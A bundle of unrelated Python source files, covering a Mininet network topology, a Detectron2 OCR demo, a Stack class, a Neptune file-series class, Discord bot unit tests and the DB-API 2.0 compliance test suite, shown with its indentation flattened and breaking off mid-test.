atm2 = self.addHost( 'atm2', ip='172.16.26.19/28')
atm3 = self.addHost( 'atm3', ip='172.16.26.20/28')
self.addLink( atm2, s_f2_2, 0, 2 )
self.addLink( atm3, s_f2_2, 0, 3 )
self.addLink( atm1, s_fl1, 0, 3 )
pnum = 4
# Add links halv of hosts to one switch - half to another
for i in range(hosts_per_sw):
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_fl1, 0, pnum )
self.addLink( t, s_fl1, 0, pnum+1 )
hnum+=1
tnum+=1
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_fl2, 0, pnum )
self.addLink( t, s_fl2, 0, pnum+1 )
hnum+=1
tnum+=1
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_f2_2, 0, pnum )
self.addLink( t, s_f2_2, 0, pnum+1 )
hnum+=1
tnum+=1
pnum += 2
def runMinimalTopo():
CONTROLLER_IP = '192.168.2.4'
num = 4
hnum = 130
tnum = 194
topo = MyTopo(num, hnum, tnum) # Create an instance of our topology
net = Mininet(topo = topo,
controller=lambda name: RemoteController( name, ip=CONTROLLER_IP),
switch=partial(OVSSwitch, protocols='OpenFlow13'),
autoSetMacs=True )
net.start()
for i in range(num):
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('sec1').cmd('ip route add default via 172.16.28.33')
net.get('sec2').cmd('ip route add default via 172.16.28.33')
net.get('atm1').cmd('ip route add default via 172.16.26.17')
net.get('atm2').cmd('ip route add default via 172.16.26.17')
net.get('atm3').cmd('ip route add default via 172.16.26.17')
net.get('s1').cmd('ovs-vsctl add-port s1 eth1')
cli = CLI(net)
# After the user exits the CLI, shutdown the network.
net.stop()
if __name__ == '__main__':
# This runs if this file is executed directly
setLogLevel( 'info' )
runMinimalTopo()
topos = { 'mytopo': MyTopo }
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import argparse
import glob
import multiprocessing as mp
import os
import time
import cv2
import tqdm
import numpy as np
from detectron2.config import get_cfg
from detectron2.data.detection_utils import read_image
from detectron2.utils.logger import setup_logger
from predictor import VisualizationDemo
# constants
WINDOW_NAME = "COCO detections"
def setup_cfg(args):
# load config from file and command-line arguments
cfg = get_cfg()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
# Set model
cfg.MODEL.WEIGHTS = args.weights
# Set score_threshold for builtin models
cfg.MODEL.RETINANET.SCORE_THRESH_TEST = args.confidence_threshold
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.confidence_threshold
cfg.MODEL.PANOPTIC_FPN.COMBINE.INSTANCES_CONFIDENCE_THRESH = args.confidence_threshold
cfg.freeze()
return cfg
def get_parser():
parser = argparse.ArgumentParser(description="Detectron2 Demo")
parser.add_argument(
"--config-file",
default="./configs/ocr/icdar2013_101_FPN.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument(
"--weights",
default="./out_dir_r101/icdar2013_model/model_ic13_r101.pth",
metavar="pth",
help="the model used to inference",
)
parser.add_argument(
"--input",
default="./input_images/*.jpg",
nargs="+",
help="the folder of icdar2013 test images"
)
parser.add_argument(
"--output",
default="./test_icdar2013/",
help="A file or directory to save output visualizations. "
"If not given, will show output in an OpenCV window.",
)
parser.add_argument(
"--confidence-threshold",
type=float,
default=0.7,
help="Minimum score for instance predictions to be shown",
)
parser.add_argument(
"--opts",
help="Modify config options using the command-line 'KEY VALUE' pairs",
default=[],
nargs=argparse.REMAINDER,
)
return parser
def save_result_to_txt(txt_save_path,prediction,polygons):
file = open(txt_save_path,'w')
classes = prediction['instances'].pred_classes
boxes = prediction['instances'].pred_boxes.tensor
for i in range(len(classes)):
if classes[i]==0:
xmin = str(int(boxes[i][0]))
ymin = str(int(boxes[i][1]))
xmax = str(int(boxes[i][2]))
ymax = str(int(boxes[i][3]))
file.writelines(xmin+','+ymin+','+xmax+','+ymax+',')
file.writelines('\r\n')
file.close()
if __name__ == "__main__":
args = get_parser().parse_args()
cfg = setup_cfg(args)
detection_demo = VisualizationDemo(cfg)
test_images_path = args.input
output_path = args.output
start_time_all = time.time()
img_count = 0
for i in glob.glob(test_images_path):
print(i)
img_name = os.path.basename(i)
img_save_path = output_path + img_name.split('.')[0] + '.jpg'
img = cv2.imread(i)
start_time = time.time()
prediction, vis_output, polygons = detection_demo.run_on_image(img)
txt_save_path = output_path + 'res_img' + img_name.split('.')[0].split('img')[1] + '.txt'
save_result_to_txt(txt_save_path,prediction,polygons)
print("Time: {:.2f} s / img".format(time.time() - start_time))
vis_output.save(img_save_path)
img_count += 1
print("Average Time: {:.2f} s /img".format((time.time() - start_time_all) / img_count))
|
from typing import Generic, TypeVar, List, Optional
T = TypeVar('T')
class Stack(Generic[T]):
def __init__(self):
self.items: List[T] = []
def empty(self) -> bool:
return len(self.items) == 0
def push(self, item: T):
self.items.append(item)
def pop(self) -> T:
return self.items.pop()
def peek(self, default: Optional[T] = None) -> Optional[T]:
if len(self.items) > 0:
return self.items[-1]
return default
|
"""Custom url shortener backend for testing Zinnia"""
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured('This backend only exists for testing')
def backend(entry):
"""Custom url shortener backend for testing Zinnia"""
return ''
|
#
# Copyright (c) 2020, Neptune Labs Sp. z o.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import imghdr
import os
import pathlib
from typing import List, Optional, Iterable
from neptune.new.internal.utils import base64_encode
from neptune.new.exceptions import FileNotFound, OperationNotSupported
from neptune.new.types import File
from neptune.new.types.series.file_series import FileSeries as FileSeriesVal
from neptune.new.internal.operation import (
ImageValue,
LogImages,
ClearImageLog,
Operation,
)
from neptune.new.attributes.series.series import Series
from neptune.utils import split_to_chunks
Val = FileSeriesVal
Data = File
class FileSeries(Series[Val, Data]):
def _get_log_operations_from_value(
self, value: Val, step: Optional[float], timestamp: float
) -> List[Operation]:
values = [
LogImages.ValueType(
ImageValue(
data=self._get_base64_image_content(val),
name=value.name,
description=value.description,
),
step=step,
ts=timestamp,
)
for val in value.values
]
return [LogImages(self._path, chunk) for chunk in split_to_chunks(values, 1)]
def _get_clear_operation(self) -> Operation:
return ClearImageLog(self._path)
def _data_to_value(self, values: Iterable, **kwargs) -> Val:
return FileSeriesVal(values, **kwargs)
def _is_value_type(self, value) -> bool:
return isinstance(value, FileSeriesVal)
@staticmethod
def _get_base64_image_content(file: File) -> str:
if file.path is not None:
if not os.path.exists(file.path):
raise FileNotFound(file.path)
with open(file.path, "rb") as image_file:
file = File.from_stream(image_file)
ext = imghdr.what("", h=file.content)
if not ext:
raise OperationNotSupported(
"FileSeries supports only image files for now. "
"Other file types will be implemented in future."
)
return base64_encode(file.content)
def download(self, destination: Optional[str]):
target_dir = self._get_destination(destination)
item_count = self._backend.get_image_series_values(
self._container_id, self._container_type, self._path, 0, 1
).totalItemCount
for i in range(0, item_count):
self._backend.download_file_series_by_index(
self._container_id, self._container_type, self._path, i, target_dir
)
def download_last(self, destination: Optional[str]):
target_dir = self._get_destination(destination)
item_count = self._backend.get_image_series_values(
self._container_id, self._container_type, self._path, 0, 1
).totalItemCount
if item_count > 0:
self._backend.download_file_series_by_index(
self._container_id,
self._container_type,
self._path,
item_count - 1,
target_dir,
)
else:
raise ValueError("Unable to download last file - series is empty")
def _get_destination(self, destination: Optional[str]):
target_dir = destination
if destination is None:
target_dir = os.path.join("neptune", self._path[-1])
pathlib.Path(os.path.abspath(target_dir)).mkdir(parents=True, exist_ok=True)
return target_dir
|
import unittest
from unittest.mock import patch, Mock
import discord
import datetime
from commands import ChangePrefixCommand
from serverobjects.server import DiscordServer
class TestChangePrefixCommand(unittest.TestCase):
def setUp(self):
self.command = ChangePrefixCommand()
self.time = datetime.datetime.now()
self.server_json = {
'server_id' : 1,
'awake' : True,
'timeout_duration_seconds': 1800,
'prefix': '!vt',
'banned_words': [{
'rowid': 1,
'server_id': 1,
'banned_word': 'vore',
'infracted_at': (self.time - datetime.timedelta(minutes=20)).strftime("%Y-%m-%d %H:%M:%S"),
'calledout_at': (self.time - datetime.timedelta(minutes=20)).strftime("%Y-%m-%d %H:%M:%S"),
'record': {
'record_seconds': 2400,
'infraction_count': 0
}
}]
}
def test_is_command_authorized__no_permissions_disallowed(self):
result = self.command.is_command_authorized()
self.assertFalse(result)
def test_is_command_authorized__non_admin_disallowed(self):
permissions = discord.Permissions()
result = self.command.is_command_authorized(permissions)
self.assertFalse(result)
def test_is_command_authorized__admin_allowed(self):
permissions = discord.Permissions.all()
result = self.command.is_command_authorized(permissions)
self.assertTrue(result)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_full_time_valid(self, prefix_patch):
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix !testin",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
retval = self.command.execute(server, self.time, message.content, message.author)
prefix_patch.assert_called_with({ 'prefix': '!testin' })
self.assertEqual(
retval,
"Cool, from now on you'll need to start a message with '!testin' for me to treat it as a command."
)
self.assertTrue(prefix_patch.called)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_prefix_too_long(self, prefix_patch):
prefix_patch.return_value = False
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix asdfasdfasdf",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
retval = self.command.execute(server, self.time, message.content, message.author)
self.assertEqual(
retval,
"Sorry, I don't understand that formatting. I was expecting a new prefix between 1 and 10 characters long."
)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_no_time_invalid(self, prefix_patch):
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
self.command.execute(server, self.time, message.content, message.author)
self.assertFalse(prefix_patch.called)
|
#!/usr/bin/env python
''' Python DB API 2.0 driver compliance unit test suite.
This software is Public Domain and may be used without restrictions.
"Now we have booze and barflies entering the discussion, plus rumours of
DBAs on drugs... and I won't tell you what flashes through my mind each
time I read the subject line with 'Anal Compliance' in it. All around
this is turning out to be a thoroughly unwholesome unit test."
-- Ian Bicking
'''
__rcs_id__ = '$Id: dbapi20.py,v 1.11 2005/01/02 02:41:01 zenzen Exp $'
__version__ = '$Revision: 1.12 $'[11:-2]
__author__ = 'Stuart Bishop <stuart@stuartbishop.net>'
import unittest
import time
import sys
# Revision 1.12 2009/02/06 03:35:11 kf7xm
# Tested okay with Python 3.0, includes last minute patches from Mark H.
#
# Revision 1.1.1.1.2.1 2008/09/20 19:54:59 rupole
# Include latest changes from main branch
# Updates for py3k
#
# Revision 1.11 2005/01/02 02:41:01 zenzen
# Update author email address
#
# Revision 1.10 2003/10/09 03:14:14 zenzen
# Add test for DB API 2.0 optional extension, where database exceptions
# are exposed as attributes on the Connection object.
#
# Revision 1.9 2003/08/13 01:16:36 zenzen
# Minor tweak from Stefan Fleiter
#
# Revision 1.8 2003/04/10 00:13:25 zenzen
# Changes, as per suggestions by M.-A. Lemburg
# - Add a table prefix, to ensure namespace collisions can always be avoided
#
# Revision 1.7 2003/02/26 23:33:37 zenzen
# Break out DDL into helper functions, as per request by David Rushby
#
# Revision 1.6 2003/02/21 03:04:33 zenzen
# Stuff from Henrik Ekelund:
# added test_None
# added test_nextset & hooks
#
# Revision 1.5 2003/02/17 22:08:43 zenzen
# Implement suggestions and code from Henrik Eklund - test that cursor.arraysize
# defaults to 1 & generic cursor.callproc test added
#
# Revision 1.4 2003/02/15 00:16:33 zenzen
# Changes, as per suggestions and bug reports by M.-A. Lemburg,
# Matthew T. Kromer, Federico Di Gregorio and Daniel Dittmar
# - Class renamed
# - Now a subclass of TestCase, to avoid requiring the driver stub
# to use multiple inheritance
# - Reversed the polarity of buggy test in test_description
# - Test exception hierarchy correctly
# - self.populate is now self._populate(), so if a driver stub
# overrides self.ddl1 this change propagates
# - VARCHAR columns now have a width, which will hopefully make the
# DDL even more portible (this will be reversed if it causes more problems)
# - cursor.rowcount being checked after various execute and fetchXXX methods
# - Check for fetchall and fetchmany returning empty lists after results
# are exhausted (already checking for empty lists if select retrieved
# nothing
# - Fix bugs in test_setoutputsize_basic and test_setinputsizes
#
def str2bytes(sval):
if sys.version_info < (3,0) and isinstance(sval, str):
sval = sval.decode("latin1")
return sval.encode("latin1")
class DatabaseAPI20Test(unittest.TestCase):
''' Test a database self.driver for DB API 2.0 compatibility.
This implementation tests Gadfly, but the TestCase
is structured so that other self.drivers can subclass this
test case to ensure compiliance with the DB-API. It is
expected that this TestCase may be expanded in the future
if ambiguities or edge conditions are discovered.
The 'Optional Extensions' are not yet being tested.
self.drivers should subclass this test, overriding setUp, tearDown,
self.driver, connect_args and connect_kw_args. Class specification
should be as follows:
import dbapi20
class mytest(dbapi20.DatabaseAPI20Test):
[...]
Don't 'import DatabaseAPI20Test from dbapi20', or you will
confuse the unit tester - just 'import dbapi20'.
'''
# The self.driver module. This should be the module where the 'connect'
# method is to be found
driver = None
connect_args = () # List of arguments to pass to connect
connect_kw_args = {} # Keyword arguments for connect
table_prefix = 'dbapi20test_' # If you need to specify a prefix for tables
ddl1 = 'create table %sbooze (name varchar(20))' % table_prefix
ddl2 = 'create table %sbarflys (name varchar(20))' % table_prefix
xddl1 = 'drop table %sbooze' % table_prefix
xddl2 = 'drop table %sbarflys' % table_prefix
lowerfunc = 'lower' # Name of stored procedure to convert string->lowercase
# Some drivers may need to override these helpers, for example adding
# a 'commit' after the execute.
def executeDDL1(self,cursor):
cursor.execute(self.ddl1)
def executeDDL2(self,cursor):
cursor.execute(self.ddl2)
def setUp(self):
''' self.drivers should override this method to perform required setup
if any is necessary, such as creating the database.
'''
pass
def tearDown(self):
''' self.drivers should override this method to perform required cleanup
if any is necessary, such as deleting the test database.
The default drops the tables that may be created.
'''
con = self._connect()
try:
cur = con.cursor()
for ddl in (self.xddl1,self.xddl2):
try:
cur.execute(ddl)
con.commit()
except self.driver.Error:
# Assume table didn't exist. Other tests will check if
# execute is busted.
pass
finally:
con.close()
def _connect(self):
try:
return self.driver.connect(
*self.connect_args,**self.connect_kw_args
)
except AttributeError:
self.fail("No connect method found in self.driver module")
def test_connect(self):
con = self._connect()
con.close()
def test_apilevel(self):
try:
# Must exist
apilevel = self.driver.apilevel
# Must equal 2.0
self.assertEqual(apilevel,'2.0')
except AttributeError:
self.fail("Driver doesn't define apilevel")
def test_threadsafety(self):
try:
# Must exist
threadsafety = self.driver.threadsafety
# Must be a valid value
self.failUnless(threadsafety in (0,1,2,3))
except AttributeError:
self.fail("Driver doesn't define threadsafety")
def test_paramstyle(self):
try:
# Must exist
paramstyle = self.driver.paramstyle
# Must be a valid value
self.failUnless(paramstyle in (
'qmark','numeric','named','format','pyformat'
))
except AttributeError:
self.fail("Driver doesn't define paramstyle")
def test_Exceptions(self):
# Make sure required exceptions exist, and are in the
# defined hierarchy.
if sys.version[0] == '3': #under Python 3 StardardError no longer exists
self.failUnless(issubclass(self.driver.Warning,Exception))
self.failUnless(issubclass(self.driver.Error,Exception))
else:
self.failUnless(issubclass(self.driver.Warning,StandardError))
self.failUnless(issubclass(self.driver.Error,StandardError))
self.failUnless(
issubclass(self.driver.InterfaceError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.DatabaseError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.OperationalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.IntegrityError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.InternalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.ProgrammingError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.NotSupportedError,self.driver.Error)
)
def test_ExceptionsAsConnectionAttributes(self):
# OPTIONAL EXTENSION
# Test for the optional DB API 2.0 extension, where the exceptions
# are exposed as attributes on the Connection object
# I figure this optional extension will be implemented by any
# driver author who is using this test suite, so it is enabled
# by default.
con = self._connect()
drv = self.driver
self.failUnless(con.Warning is drv.Warning)
self.failUnless(con.Error is drv.Error)
self.failUnless(con.InterfaceError is drv.InterfaceError)
self.failUnless(con.DatabaseError is drv.DatabaseError)
self.failUnless(con.OperationalError is drv.OperationalError)
self.failUnless(con.IntegrityError is drv.IntegrityError)
self.failUnless(con.InternalError is drv.InternalError)
self.failUnless(con.ProgrammingError is drv.ProgrammingError)
self.failUnless(con.NotSupportedError is drv.NotSupportedError)
def test_commit(self):
con = self._connect()
try:
# Commit must work, even if it doesn't do anything
con.commit()
finally:
con.close()
def test_rollback(self):
con = self._connect()
# If rollback is defined, it should either work or throw
# the documented exception
if hasattr(con,'rollback'):
try:
con.rollback()
except self.driver.NotSupportedError:
pass
def test_cursor(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
def test_cursor_isolation(self):
con = self._connect()
try:
# Make sure cursors created from the same connection have
# the documented transaction isolation level
cur1 = con.cursor()
cur2 = con.cursor()
self.executeDDL1(cur1)
cur1.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
cur2.execute("select name from %sbooze" % self.table_prefix)
booze = cur2.fetchall()
self.assertEqual(len(booze),1)
self.assertEqual(len(booze[0]),1)
self.assertEqual(booze[0][0],'Victoria Bitter')
finally:
con.close()
def test_description(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.description,None,
'cursor.description should be none after executing a '
'statement that can return no rows (such as DDL)'
)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(len(cur.description),1,
'cursor.description describes too many columns'
)
self.assertEqual(len(cur.description[0]),7,
'cursor.description[x] tuples must have 7 elements'
)
self.assertEqual(cur.description[0][0].lower(),'name',
'cursor.description[x][0] must return column name'
)
self.assertEqual(cur.description[0][1],self.driver.STRING,
'cursor.description[x][1] must return column type. Got %r'
% cur.description[0][1]
)
# Make sure self.description gets reset
self.executeDDL2(cur)
self.assertEqual(cur.description,None,
'cursor.description not being set to None when executing '
'no-result statements (eg. DDL)'
)
finally:
con.close()
def test_rowcount(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount should be -1 after executing no-result '
'statements'
)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1),
'cursor.rowcount should == number or rows inserted, or '
'set to -1 after executing an insert statement'
)
cur.execute("select name from %sbooze" % self.table_prefix)
self.failUnless(cur.rowcount in (-1,1),
'cursor.rowcount should == number of rows returned, or '
'set to -1 after executing a select statement'
)
self.executeDDL2(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount not being reset to -1 after executing '
'no-result statements'
)
finally:
con.close()
lower_func = 'lower'
def test_callproc(self):
con = self._connect()
try:
cur = con.cursor()
if self.lower_func and hasattr(cur,'callproc'):
r = cur.callproc(self.lower_func,('FOO',))
self.assertEqual(len(r),1)
self.assertEqual(r[0],'FOO')
r = cur.fetchall()
self.assertEqual(len(r),1,'callproc produced no result set')
self.assertEqual(len(r[0]),1,
'callproc produced invalid result set'
)
self.assertEqual(r[0][0],'foo',
'callproc produced invalid results'
)
finally:
con.close()
def test_close(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
# cursor.execute should raise an Error if called after connection
# closed
self.assertRaises(self.driver.Error,self.executeDDL1,cur)
# connection.commit should raise an Error if called after connection'
# closed.'
self.assertRaises(self.driver.Error,con.commit)
# connection.close should raise an Error if called more than once
# Issue discussed on DB-SIG: consensus seem that close() should not
# raised if called on closed objects. Issue reported back to Stuart.
# self.assertRaises(self.driver.Error,con.close)
def test_execute(self):
con = self._connect()
try:
cur = con.cursor()
self._paraminsert(cur)
finally:
con.close()
def _paraminsert(self,cur):
self.executeDDL1(cur)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1))
if self.driver.paramstyle == 'qmark':
cur.execute(
'insert into %sbooze values (?)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'numeric':
cur.execute(
'insert into %sbooze values (:1)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'named':
cur.execute(
'insert into %sbooze values (:beer)' % self.table_prefix,
{'beer':"Cooper's"}
)
elif self.driver.paramstyle == 'format':
cur.execute(
'insert into %sbooze values (%%s)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'pyformat':
cur.execute(
'insert into %sbooze values (%%(beer)s)' % self.table_prefix,
{'beer':"Cooper's"}
)
else:
self.fail('Invalid paramstyle')
self.failUnless(cur.rowcount in (-1,1))
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,'cursor.fetchall returned too few rows')
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Cooper's",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
self.assertEqual(beers[1],"Victoria Bitter",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
def test_executemany(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
largs = [ ("Cooper's",) , ("Boag's",) ]
margs = [ {'beer': "Cooper's"}, {'beer': "Boag's"} ]
if self.driver.paramstyle == 'qmark':
cur.executemany(
'insert into %sbooze values (?)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'numeric':
cur.executemany(
'insert into %sbooze values (:1)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'named':
cur.executemany(
'insert into %sbooze values (:beer)' % self.table_prefix,
margs
)
elif self.driver.paramstyle == 'format':
cur.executemany(
'insert into %sbooze values (%%s)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'pyformat':
cur.executemany(
'insert into %sbooze values (%%(beer)s)' % (
self.table_prefix
),
margs
)
else:
self.fail('Unknown paramstyle')
self.failUnless(cur.rowcount in (-1,2),
'insert using cursor.executemany set cursor.rowcount to '
'incorrect value %r' % cur.rowcount
)
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,
'cursor.fetchall retrieved incorrect number of rows'
)
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Boag's",'incorrect data retrieved')
self.assertEqual(beers[1],"Cooper's",'incorrect data retrieved')
finally:
con.close()
def test_fetchone(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchone should raise an Error if called before
# executing a select-type query
self.assertRaises(self.driver.Error,cur.fetchone)
# cursor.fetchone should raise an Error if called after
# executing a query that cannot return rows
self.executeDDL1(cur)
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if a query retrieves '
'no rows'
)
self.failUnless(cur.rowcount in (-1,0))
# cursor.fetchone should raise an Error if called after
# executing a query that cannot return rows
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchone()
self.assertEqual(len(r),1,
'cursor.fetchone should have retrieved a single row'
)
self.assertEqual(r[0],'Victoria Bitter',
'cursor.fetchone retrieved incorrect data'
)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if no more rows available'
)
self.failUnless(cur.rowcount in (-1,1))
finally:
con.close()
samples = [
'Carlton Cold',
'Carlton Draft',
'Mountain Goat',
'Redback',
'Victoria Bitter',
'XXXX'
]
def _populate(self):
''' Return a list of sql commands to setup the DB for the fetch
tests.
'''
populate = [
"insert into %sbooze values ('%s')" % (self.table_prefix,s)
for s in self.samples
]
return populate
def test_fetchmany(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchmany should raise an Error if called without
#issuing a query
self.assertRaises(self.driver.Error,cur.fetchmany,4)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany()
self.assertEqual(len(r),1,
'cursor.fetchmany retrieved incorrect number of rows, '
'default of arraysize is one.'
)
cur.arraysize=10
r = cur.fetchmany(3) # Should get 3 rows
self.assertEqual(len(r),3,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should get 2 more
self.assertEqual(len(r),2,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should be an empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence after '
'results are exhausted'
)
self.failUnless(cur.rowcount in (-1,6))
# Same as above, using cursor.arraysize
cur.arraysize=4
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany() # Should get 4 rows
self.assertEqual(len(r),4,
'cursor.arraysize not being honoured by fetchmany'
)
r = cur.fetchmany() # Should get 2 more
self.assertEqual(len(r),2)
r = cur.fetchmany() # Should be an empty sequence
self.assertEqual(len(r),0)
self.failUnless(cur.rowcount in (-1,6))
cur.arraysize=6
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchmany() # Should get all rows
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows),6)
self.assertEqual(len(rows),6)
rows = [r[0] for r in rows]
rows.sort()
# Make sure we get the right data back out
for i in range(0,6):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved by cursor.fetchmany'
)
rows = cur.fetchmany() # Should return an empty list
self.assertEqual(len(rows),0,
'cursor.fetchmany should return an empty sequence if '
'called after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,6))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
r = cur.fetchmany() # Should get empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence if '
'query retrieved no rows'
)
self.failUnless(cur.rowcount in (-1,0))
finally:
con.close()
def test_fetchall(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchall should raise an Error if called
# without executing a query that may return rows (such
# as a select)
self.assertRaises(self.driver.Error, cur.fetchall)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
# cursor.fetchall should raise an Error if called
# after executing a a statement that cannot return rows
self.assertRaises(self.driver.Error,cur.fetchall)
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.assertEqual(len(rows),len(self.samples),
'cursor.fetchall did not retrieve all rows'
)
rows = [r[0] for r in rows]
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'cursor.fetchall retrieved incorrect rows'
)
rows = cur.fetchall()
self.assertEqual(
len(rows),0,
'cursor.fetchall should return an empty list if called '
'after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,0))
self.assertEqual(len(rows),0,
'cursor.fetchall should return an empty list if '
'a select query returns no rows'
)
finally:
con.close()
def test_mixedfetch(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
rows1 = cur.fetchone()
rows23 = cur.fetchmany(2)
rows4 = cur.fetchone()
rows56 = cur.fetchall()
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows23),2,
'fetchmany returned incorrect number of rows'
)
self.assertEqual(len(rows56),2,
'fetchall returned incorrect number of rows'
)
rows = [rows1[0]]
rows.extend([rows23[0][0],rows23[1][0]])
rows.append(rows4[0])
rows.extend([rows56[0][0],rows56[1][0]])
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved or inserted'
)
finally:
con.close()
def help_nextset_setUp(self,cur):
''' Should create a procedure called deleteme
that returns two result sets, first the
number of rows in booze then "name from booze"
'''
raise NotImplementedError('Helper not implemented')
#sql="""
# create procedure deleteme as
# begin
# select count(*) from booze
# select name from booze
# end
#"""
#cur.execute(sql)
def help_nextset_tearDown(self,cur):
'If cleaning up is needed after nextSetTest'
raise NotImplementedError('Helper not implemented')
#cur.execute("drop procedure deleteme")
def test_nextset(self):
con = self._connect()
try:
cur = con.cursor()
if not hasattr(cur,'nextset'):
return
try:
self.executeDDL1(cur)
sql=self._populate()
for sql in self._populate():
cur.execute(sql)
self.help_nextset_setUp(cur)
cur.callproc('deleteme')
numberofrows=cur.fetchone()
assert numberofrows[0]== len(self.samples)
assert cur.nextset()
